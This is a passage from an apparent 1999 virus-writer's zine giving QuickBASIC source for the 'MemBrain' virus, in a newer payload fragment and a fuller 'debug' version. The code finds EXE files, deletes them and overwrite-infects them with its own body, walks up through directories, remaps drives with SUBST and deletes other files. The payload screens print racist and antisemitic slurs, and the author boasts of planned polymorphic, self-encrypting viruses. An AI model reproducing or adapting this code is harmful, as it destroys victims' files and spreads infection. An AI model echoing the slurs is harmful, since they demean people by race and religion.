NEXT NEXT K=0 DO PRINT #1, c$ LOCATE 15, 1: PRINT "KB: "; K L! = L / 1000 LOCATE 16, 1: PRINT "MEGS: "; L K = K + 10 LOOP END IF IF MID$(DATE$, 1, 5) = "05-09" THEN CLS COLOR 4 PRINT "REJOICE! ITS MY BIRTHDAY!! LOOK:" COLOR 3 PRINT "----------------------------------------------------------" COLOR 1 PRINT "DIGI-BIRTH CERTIFICATE OF: "; : COLOR 12: PRINT "MEMBRAIN VIRUS, THE"; : COLOR 3: PRINT " ---" COLOR 7 PRINT "DATE OF BIRTH:"; : COLOR 15: PRINT " SUNDAY MAY 9, 1999"; : COLOR 3: PRINT " ---" COLOR 7 PRINT "FATHER'S NAME:"; : COLOR 15: PRINT " phr0ck aka Krimson Kaper, br0k3n, hwulf"; : COLOR 3: PRINT " ---" COLOR 7 PRINT "MOTHER'S NAME:"; : COLOR 15: PRINT " Microsoft Compiler QuickBasic 4.5"; : COLOR 3: PRINT " ---" COLOR 7 PRINT "WEIGHT:"; : COLOR 15: PRINT " 59.5 Kilobytes (k = 1000 Bytes) "; : COLOR 3: PRINT " ---" COLOR 3 PRINT "----------------------------------------------------------" '-------LPRINT "REJOICE! ITS MY BIRTHDAY!! LOOK:" LPRINT "----------------------------------------------------------" LPRINT "DIGI-BIRTH CERTIFICATE OF: MEMBRAIN VIRUS, THE ---" LPRINT "DATE OF BIRTH: WEDNESDAY MARCH 31, 1999 ---" LPRINT "FATHER'S NAME: phr0ck aka Krimson Kaper, br0k3n, hwulf ---" LPRINT "MOTHER'S NAME: Microsoft Compiler QuickBasic 4.5 ---" LPRINT "BABY'S SIZE: 59.5 Kilobytes ---" LPRINT "----------------------------------------------------------" LPRINT "" LPRINT "" LPRINT "Hi there. I guess i am stuck with you..well hi. I am kinda" LPRINT "shy, so pardon the shyness. As you know i am a virus. Please," LPRINT "i ALWAYS get that reaction. We virii have a bad rep, but I" LPRINT "guess i can understand. Well...hi! Its my birthday just to" LPRINT "let you know. My name is MemBrain, treat me nice of i'll fuck" LPRINT "your computer up! Wigga!:)) Heh! Fag. Bye. Say hiye to phr0ck!" ZZTOP = INT(RND * 10) + 1 IF ZZTOP = 6 THEN SHELL "SUBST A: " + CurrentDirectory$ IF ZZTOP = 9 THEN SHELL "SUBST C: A:" DO

SOUND 2700, 1 SOUND 333, 1 SOUND 3953, 1 SOUND 3452, 1 SOUND 2095, 1 SOUND 994, 1 LOOP END IF

c$ = CurrentDirectory$: d$ = LEFT$(DATE$, 5) IF (c$ = "C:\HACKING") OR (c$ = "C:\QBASIC") OR (c$ = "C:\QB45") OR (d$ = "05-03") OR (d$ = "06-09") OR (d$ = "12-24") OR (d$ = "12-29") OR (d$ = "07-04") OR (d$ = "04-02") THEN CLS CX = 6 BX = 12 MX = 1 COLOR CX PRINT "" PRINT ""; : COLOR MX: PRINT " ThE"; : COLOR CX: PRINT " " PRINT ""; : COLOR 15: PRINT " ,$$$$. .$$$$, .$$$$$$$' ,$$$$ $$$$, "; : COLOR CX: PRINT "" PRINT ""; : COLOR 7: PRINT " $$$$$$$$ $$$$$$$$ $$$$$ $$$$$$$$ $$$$$$$$ "; : COLOR CX: PRINT "" PRINT ""; : COLOR 8: PRINT " $$$$$$ $ $$$$$$ $$$$$$$$) $$$$$$ $ $$$$$$ "; : COLOR CX: PRINT "" PRINT ""; : COLOR 7: PRINT " $$$$$$ $$$$$$ $$$$$ $$$$$$ $$$$$$ "; : COLOR CX: PRINT "" PRINT ""; : COLOR 15: PRINT " `$$' `$$' `$$$$$$$, `$$' `$$' "; : COLOR CX: PRINT "" PRINT ""; : COLOR 9: PRINT " cReaTed By phr0ck (aka Krimson Kaper,br0k3n,hwulf) "; : COLOR CX: PRINT "" PRINT ""; : COLOR 4: PRINT " $$$$$$$$$. ,$$$$$$$$, ,$$$$$$, `$$$$$$$$$' ,$$$$. ,$$$$. "; : COLOR CX: PRINT "" PRINT ""; : COLOR BX: PRINT " $$$$ $$$ $$$$ $$ $$$' `$$$ `$$$' $$$$$$$$ $$$$$$ "; : COLOR CX: PRINT "" PRINT ""; : COLOR BX: PRINT " $$$$$$$$$$ $$$$$$$$$, $$$$$$$$$$ $$$ $$$$$$ $$ $$$$$$ "; : COLOR CX: PRINT "" PRINT ""; : COLOR BX: PRINT " $$$$ $$$ $$$$ $$$ $$$ $$$ .$$$. $$$$$$ $$$$$$$$ "; : COLOR CX: PRINT "" PRINT ""; : COLOR 4: PRINT " $$$$$$$$$' `$$$ $$$, `$$ $$' .$$$$$$$$$. `$$' `$$' "; : COLOR CX: PRINT "" PRINT ""; : COLOR 4: PRINT " ViRuS "; : COLOR CX: PRINT "" PRINT "" PRINT ""; : COLOR 14: PRINT " The MemBrain vIrUs owNs YOu! "; : COLOR CX: PRINT "" PRINT "" PRINT ""; : COLOR 5: PRINT "oH gAwd, ThIs mEssAge alon3 iS a CoUple Of K's WeRth! WeLL sUckEr, You"; : COLOR CX: PRINT "" PRINT ""; : COLOR 5: PRINT " hAvE beEn oUt SmArtEd bY thA MemBraIn! We vIruSes HaVe livEs T00 yA "; : COLOR CX: PRINT "" PRINT ""; : COLOR 5: PRINT "know!! PlEaSe gIVe uS a LiTtlE mOrE reSpekT! StOp tHe KillINg of vIrii"; : COLOR CX: PRINT "" PRINT "" DELAY 15 DO X = INT(RND * 1000) KEY$ = INKEY$ CLS COLOR 15 PRINT "IN-"; : PLAY "L15AD" PRINT "SANE "; : PLAY "L15CD" PRINT "IN"; : PLAY "L15GD"

PRINT " DA "; : PLAY "L15AC" PRINT "MEM-"; : PLAY "L15DF" PRINT "BRAIN"; : PLAY "L15A" PRINT " IN-"; : PLAY "L13AG" PRINT "SANE "; : PLAY "L13GA" PRINT "IN-"; : PLAY "L13BC" PRINT "DA "; : PLAY "L13FG" PRINT "BRAIN@!@" DELAY 1 COLOR 8 IF KEY$ <> "" THEN PRINT "PHR0CK AND HIS PET THE MEMBRAIN VIRUS OWNZ YOUR SORRY WHITE ASS!": DELAY 1 IF KEY$ <> "" THEN PRINT "GREETZ TO ALL MAH VIRII AND NIGGAZ AT eK, Got-Root, N HEH, qBASIC": DELAY 1 IF KEY$ <> "" THEN PRINT "ICESK: FUCK YOUR WHITE ASS ARYAN FUCKER!@ BLACKPANTHER COMING SOON": DELAY 1 IF KEY$ <> "" THEN PRINT "AHH SHIT NIGGA, FUQ DEM JEWS AND B00ZE! -ALL VXers UNITE 1 N ALL!!": DELAY 1 IF KEY$ <> "" THEN COLOR 20: PRINT "HA HA HA HA HA HA HA HA HA YOUR INFECTED WITH THE MEMBRAIN VIRUS!!": DELAY 2 IF KEY$ <> "" THEN COLOR 7: PRINT "CREATED BY ME (phr0ck OF COURSE, IN KEW BEEE!!!!": DELAY 2 LOOP UNTIL X = 420 KILL DECRYPT$("43") COLOR 3 PRINT "CYPRESS HILL "; : COLOR 15: PRINT "SOUNDS GOOD. KER PLUNK, ITS A HARD NOC LYPHE!" DELAY 3 CLS END IF END SUB

---[End Cut!]

That was the newer model of the Membrain VIrus, somewhat better improved. Here was the older one. i crippled it in a way that it wont infect but i would comment KILL lines out if i were you because i accidentally deleted a lot of my files that way! HEH. silly me. Here is a "DEBUG" version of the membrain virus: ---------MBtext.bas [Cut Here] 'The Membrain Virus, The First actual *WORKING* 'Virus made with QuickBASIC 4.5. 'programmmed by phr0q 'questions or comments go to: 'phr0q@budlight.com 'First release of this version. This is only 'a debug version of the membrain source code, this 'is a crippled version just uncomment the stuff. this made 'so that you can analyze this. If you dont believe it works 'just run it! Nothing bad will happen, just a simulation of 'infection. For the full normal source for The Membrain Virus 'please check out my site: http://phr0q.com/membrain/membrain.bas

'for the exe: http://phr0q.com/membrain/membrain.zip 'Shouts to: nugz, mike, mel, sSh and ... to icesk you vxER wanna beh. '#virus ! #quickbasic ! @efnet '(C)opyrite phr0q 1999 DECLARE SUB DELAY (howlong!) DECLARE SUB PAYLOAD () DECLARE FUNCTION NAME$ () DIM byte(1 TO 12000) DIM Buffer AS LONG COMMON SHARED F$, EXT$ CLS MAIN: CLOSE SHELL "IF EXIST DEL TEMP.tmp" SHELL "DIR " + " *.* > TEMP.tmp" '-------------------------------------SHELL "ATTRIB +H +R TEMP.tmp" PRINT "OPENING TEMP FILE..." OPEN "TEMP.tmp" FOR INPUT AS #1 PRINT "TEMP FILE OPENED..." FOR A = 1 TO 5 LINE INPUT #1, A$ NEXT LINE INPUT #1, A$ 'FOR A = 1 TO LEN(A$) 'B$ = MID$(A$, A, 1) 'IF B$ = " " THEN GOTO FIN1 'F$ = F$ + B$ 'NEXT FIN1: 'F$ = MID$(F$, 1, LEN(F$) - 1) ' PRINT F$ + " " + STR$(LEN(F$)) + " ROOT DIRECTORY" 'B$ = "": F$ = "": A$ = "" LINE INPUT #1, A$ 'FOR A = 1 TO LEN(A$) 'B$ = MID$(A$, A, 1) 'F$ = F$ + B$ 'IF B$ = " " THEN GOTO FIN2 'NEXT FIN2: 'F$ = MID$(F$, 1, LEN(F$) - 1) ' PRINT F$ + " " + STR$(LEN(F$)) + " PARENT DIRECTORY" '----------GETTING ROOT, PARENT AND CHECKING IF ANY FILES EXIST-------------'

GETNEXT: Z=Z+1 F$ = "": A$ = "": B$ = "": A = 0 LINE INPUT #1, A$ IF LEFT$(A$, 1) = " " THEN GOTO FIN0 'CHECK IF THIS IS THE END OF FILE LISTING

FOR A = 1 TO LEN(A$) B$ = MID$(A$, A, 1) IF B$ = " " THEN GOTO FIN3 F$ = F$ + B$ NEXT FIN3: V = LEN(F$) '- 1 '-1 BECAUSE OF THAT 1 SPACE C=A-V F$ = "" IF A$ = "" THEN GOTO FIN0 ' =---------------------OR INSTR(A$, " ") FOR A = C TO LEN(A$) B$ = MID$(A$, A, 1) F$ = F$ + B$ IF B$ = " " THEN GOTO FIN4 NEXT FIN4: F$ = MID$(F$, 1, LEN(F$) - 1) PRINT F$ + " " + STR$(LEN(F$)) 'CLOSE 'END PRINT F$ + " " + STR$(LEN(F$)) ' = MID$(F$, 1, LEN(F$)) EXT$ = MID$(A$, 10, 3) PRINT "HOST: " + F$ + "." + EXT$ '---------IF EXT$ = " " OR EXT$ = "" THEN EXT$ = "DIRECTORY": GOTO NARXT IF UCASE$(EXT$) <> "EXE" THEN PRINT "ERROR, NOT AN .EXE FILE": SOUND 4555, 1: SLEEP: GOTO NARXT 'IF INSTR(F$, " ") THEN GOTO NARXT IF F$ = "" OR INSTR(F$, " ") THEN GOTO FIN0 CONT: IF F$ = "TEMP" THEN IF EXT$ = "TMP" THEN GOTO NARXT PRINT "ATTEMPTING TO INFECTING FILE: " + F$ + "." + EXT$ PRINT "CHECKING FOR PREVIOUS FILE INFECTION..." CLOSE #2, #3, #9, #4 PRINT "OPENING THE HOST FILE FOR PREVIOUS INFECTION CHECK..." PRINT F$ + "." + EXT$ DO: LOOP UNTIL INKEY$ <> "" OPEN F$ + "." + EXT$ FOR INPUT AS #9

PRINT "HOST FILE OPENED FOR PREVIOUS INFECTION CHECK..." IF LOF(9) = 0 THEN CLOSE #9: GOTO NARXT LINE INPUT #9, FULL$ CLOSE #9 IF INSTR(FULL$, "MEMBRAIN") THEN PRINT "FILE ALREADY INFECTED!!": SLEEP: FULL$ = "": GOTO NARXT FULL$ = "" COLOR 6 PRINT "EXTENSION OF FILE: " + EXT$ + " " + STR$(LEN(EXT$)) COLOR 4 '--------------iNFECTiN PRoCeSS-------------PRINT "PRESS ANY KEY TO INFECT A FILE!!" SLEEP COLOR 1 SOUND 2600, 4 PRINT "INFECTING FILE: " + F$ + "." + EXT$ + " " + STR$(LEN(F$ + "." + EXT$)) CLOSE #13 COLOR 15 PRINT "PASSING HOST THROUGH INSPECTION..." OPEN F$ + "." + EXT$ FOR INPUT AS #13 IF LOF(13) = 0 THEN CLOSE #13: GOTO NARXT LINE INPUT #13, EHX$ IF MID$(EHX$, 1, 2) <> "MZ" THEN CLOSE #13: PRINT "FAKE HEADER DETECTED!!!...": SLEEP: GOTO NARXT CLOSE #13 PRINT "INSPECTION FINISHED..." COLOR 1 PRINT "KILL F$ + '.' + EXT$" KILL F$ + "." + EXT$ PRINT "DONE KILL F$ + '.' + EXT$" COLOR 8 PRINT "CURRENT PROGRAM " + NAME$ COLOR 1 SLEEP GOTO hera CLOSE #2, #3 OPEN NAME$ FOR BINARY AS #2 OPEN F$ + "." + EXT$ FOR BINARY AS #3 DO Buffer = Buffer + 1 GET 2, , byte(Buffer) PUT 3, , byte(Buffer) LOOP UNTIL EOF(2) CLOSE #2: CLOSE #3 hera: INFECTEDEXES = INFECTEDEXES + 1

SOUND 2600, 10 PRINT "DONE INFECTING FILE..." COLOR 7 SLEEP '============ COLOR 7 NARXT: IF Z > 15 THEN GOTO ENDOFLINE IF INFECTEDEXES < 3 THEN GOTO GETNEXT

'-----------GET A FILE OR DIRECTORY, JUDGE WETHER ITS A DIR OR NOT----------GOTO FIN0 ABORT: FIN0: IF INFECTEDEXES < 3 THEN SHELL "IF EXIST ATTRIB -H -R TEMP.TMP" RESET ON ERROR GOTO OHSHIAT KILL "TEMP.TMP" GOTO ConT2 OHSHIAT: PRINT "SHIT!!..ERROR DELETING THE 'TEMP.TMP' FILE!!" ConT2: SHELL "CD > CD.TMP" OPEN "CD.TMP" FOR INPUT AS #5 LINE INPUT #5, CURRDIR$ CLOSE #5 KILL "CD.TMP" FOR L = 1 TO LEN(CURRDIR$) L$ = MID$(CURRDIR$, L, 1) IF L$ = "\" THEN SLASH = SLASH + 1 NEXT IF SLASH < 2 THEN GOTO ENDOFLINE 'MEANS WE ARE IN ROOT DIRECTORY PRINT "CHANGING DIR.." CHDIR ".." GOTO MAIN END IF ENDOFLINE: SHELL "IF EXIST ATTRIB -H -R TEMP.TMP" RESET ON ERROR GOTO SHNAT KILL "TEMP.TMP" SHNAT: END SUB DELAY (howlong!)

N! = TIMER DO: LOOP WHILE TIMER - N! < howlong! END SUB FUNCTION NAME$ ' ' Set up machine code routine and call it to get PSP. ' DIM MCODE(1 TO 7) AS INTEGER, OS AS INTEGER, BX AS INTEGER, DUMMY AS LONG DEF SEG = VARSEG(MCODE(1)) OS = VARPTR(MCODE(1)) POKE OS, &H55'PUSH BP POKE OS + 1, &H89: POKE OS + 2, &HE5'MOV BP,SP POKE OS + 3, &HB4: POKE OS + 4, &H62'MOV AH,62 POKE OS + 5, &HCD: POKE OS + 6, &H21'INT 21 POKE OS + 7, &H8B: POKE OS + 8, &H7E: POKE OS + 9, 6'MOV DI,[BP+6] POKE OS + 10, &H89: POKE OS + 11, &H1D'MOV [DI],BX POKE OS + 12, &H5D'POP BP POKE OS + 13, &HCB'RETF CALL ABSOLUTE(BX, OS) ' ' Point memory pointer to program segment prefix. ' DEF SEG = BX ' ' Get memory location where DOS environment copy begins and point memory ' pointer there. ' ENVSM = PEEK(&H2C) + 256 * PEEK(&H2D) ENVOS = 0 DEF SEG = ENVSM ' ' Look in memory for four bytes equalling a LONG integer of 65,536. ' (Note that DUMMY was DIMmed as such a LONG integer above.) ' DUMMY = 0& WHILE DUMMY <> 65536 DUMMY = PEEK(ENVOS) + 256& * (PEEK(ENVOS + 1) + 256& * (PEEK(ENVOS + 2) + 256& * PEEK(ENVOS + 3))) ENVOS = ENVOS + 1 WEND ENVOS = ENVOS + 3 ' ' ENVOS is now the offset into the memory segment at ENVSM where your ' program name starts. Concatenate the characters in that string into ' NAME$ until the ASCII 0 is reached, updating ENVOS along the way. ' N$ = "" A=1 WHILE A <> 0 A = PEEK(ENVOS) IF A <> 0 THEN N$ = N$ + CHR$(A)

ENVOS = ENVOS + 1 WEND DEF SEG ' ' N$ is the program name; set NAME$ equal to it and exit function. ' NAME$ = N$ END FUNCTION SUB PAYLOAD 'ON ERROR GOTO SHOOPDEYOOP OPEN "C:\XBRAIN.MEM" FOR INPUT AS #6 LINE INPUT #6, FD$ CLOSE #1 IF INSTR(UCASE$(FD$), "INSANE IN THE MEMBRAIN INSANE IN THE BRAIN") THEN CLOSE : KILL NAME$: END SHOOPDEYOOP: CLS CX = 6 BX = 12 MX = 1 COLOR CX PRINT "" PRINT ""; : COLOR MX: PRINT " ThE"; : COLOR CX: PRINT " " PRINT ""; : COLOR 15: PRINT " ,$$$$. .$$$$, .$$$$$$$' ,$$$$ $$$$, "; : COLOR CX: PRINT "" PRINT ""; : COLOR 7: PRINT " $$$$$$$$ $$$$$$$$ $$$$$ $$$$$$$$ $$$$$$$$ "; : COLOR CX: PRINT "" PRINT ""; : COLOR 8: PRINT " $$$$$$ $ $$$$$$ $$$$$$$$) $$$$$$ $ $$$$$$ "; : COLOR CX: PRINT "" PRINT ""; : COLOR 7: PRINT " $$$$$$ $$$$$$ $$$$$ $$$$$$ $$$$$$ "; : COLOR CX: PRINT "" PRINT ""; : COLOR 15: PRINT " `$$' `$$' `$$$$$$$, `$$' `$$' "; : COLOR CX: PRINT "" PRINT ""; : COLOR 9: PRINT " cReaTed By phr0ck (aka Krimson Kaper,br0k3n,hwulf) "; : COLOR CX: PRINT "" PRINT ""; : COLOR 4: PRINT " $$$$$$$$$. ,$$$$$$$$, ,$$$$$$, `$$$$$$$$$' ,$$$$. ,$$$$. "; : COLOR CX: PRINT "" PRINT ""; : COLOR BX: PRINT " $$$$ $$$ $$$$ $$ $$$' `$$$ `$$$' $$$$$$$$ $$$$$$ "; : COLOR CX: PRINT "" PRINT ""; : COLOR BX: PRINT " $$$$$$$$$$ $$$$$$$$$, $$$$$$$$$$ $$$ $$$$$$ $$ $$$$$$ "; : COLOR CX: PRINT "" PRINT ""; : COLOR BX: PRINT " $$$$ $$$ $$$$ $$$ $$$ $$$ .$$$. $$$$$$ $$$$$$$$ "; : COLOR CX: PRINT "" PRINT ""; : COLOR 4: PRINT " $$$$$$$$$' `$$$ $$$, `$$ $$' .$$$$$$$$$. `$$' `$$' "; : COLOR CX: PRINT "" PRINT ""; : COLOR 4: PRINT " ViRuS "; : COLOR CX: PRINT "" PRINT "" PRINT ""; : COLOR 14: PRINT " The MemBrain vIrUs owNs YOu! "; : COLOR CX: PRINT "" PRINT "" PRINT ""; : COLOR 5: PRINT "oH gAwd, ThIs mEssAge alon3 iS a CoUple Of K's WeRth! WeLL sUckEr, You"; : COLOR CX: PRINT "" PRINT ""; : COLOR 5: PRINT " hAvE beEn oUt SmArtEd bY thA MemBraIn! We vIruSes HaVe livEs T00 yA "; : COLOR CX: PRINT "" PRINT ""; : COLOR 5: PRINT "know!! PlEaSe gIVe uS a LiTtlE mOrE reSpekT! StOp tHe KillINg of vIrii"; : COLOR CX: PRINT "" PRINT "" DELAY 15 DO KEY$ = INKEY$ CLS COLOR 15

PRINT "IN-"; : PLAY "L15AD" PRINT "SANE "; : PLAY "L15CD" PRINT "IN"; : PLAY "L15GD" PRINT " DA "; : PLAY "L15AC" PRINT "MEM-"; : PLAY "L15DF" PRINT "BRAIN"; : PLAY "L15A" PRINT " IN-"; : PLAY "L13AG" PRINT "SANE "; : PLAY "L13GA" PRINT "IN-"; : PLAY "L13BC" PRINT "DA "; : PLAY "L13FG" PRINT "BRAIN@!@" DELAY 1 COLOR 8 IF KEY$ <> "" THEN PRINT "PHR0CK AND HIS PET THE MEMBRAIN VIRUS OWNZ YOUR SORRY WHITE ASS!": DELAY 1 IF KEY$ <> "" THEN PRINT "GREETZ TO ALL MAH VIRII AND NIGGAZ AT eK, Got-Root, N HEH, qBASIC": DELAY 1 IF KEY$ <> "" THEN PRINT "ICESK: FUCK YOUR WHITE ASS ARYAN FUCKER!@ BLACKPANTHER COMING SOON": DELAY 1 IF KEY$ <> "" THEN PRINT "AHH SHIT NIGGA, FUQ DEM JEWS AND B00ZE! -ALL VXers UNITE 1 N ALL!!": DELAY 1 IF KEY$ <> "" THEN COLOR 20: PRINT "HA HA HA HA HA HA HA HA HA YOUR INFECTED WITH THE MEMBRAIN VIRUS!!": DELAY 2 IF KEY$ <> "" THEN COLOR 7: PRINT "CREATED BY ME (phr0ck OF COURSE, IN KEW BEEE!!!!": DELAY 2 LOOP END SUB

[End Cut!]

-=[HRM]=I havent much to say about membrain, only that it is the best so far. heh. later i promise to make BASIC virii 10x much better. Like: Non_Overwriting virii Polymorphic Engine (slow/fast) Self-Encryption Anti-Bait\Goat Techniques Kamaikaze (TM) Technique And a whole other load of shit that will make you Qb coders cream you filthy lingre! With an out going word i want to announce virii in the making. I have another done already. The CYB3X Virus by phr0q which whoops ass because it has a non-destructive payload but *IS* an overwriter. Nice payload trust me. like taking LCD ('CID) and also the CyberNinja series and a LOT more@!#$ nugz owns

-=[Links]=-

members.tripod.com/phr0q/text phr0q.com/membrain/ tlsecurity.com b4b0.org -=[Last Words]=if you want criticism on your qb viruses please check out my section of the site: phr0q.com/virii/basvir.txt for the critism on that one horrid virus made by some lcd induced hippy and by the way PLEASE AND DOUBLE PLEASE mail me at phr0q@budlight.com or phr0q@ minister.com for any comments plez. Thank you. Ideas and comments will be appreciated. Virii..

All boys will be seduced BASICally by the grandmaster of BASIC viruses and worms and what not: (dont forget logic bombs too!)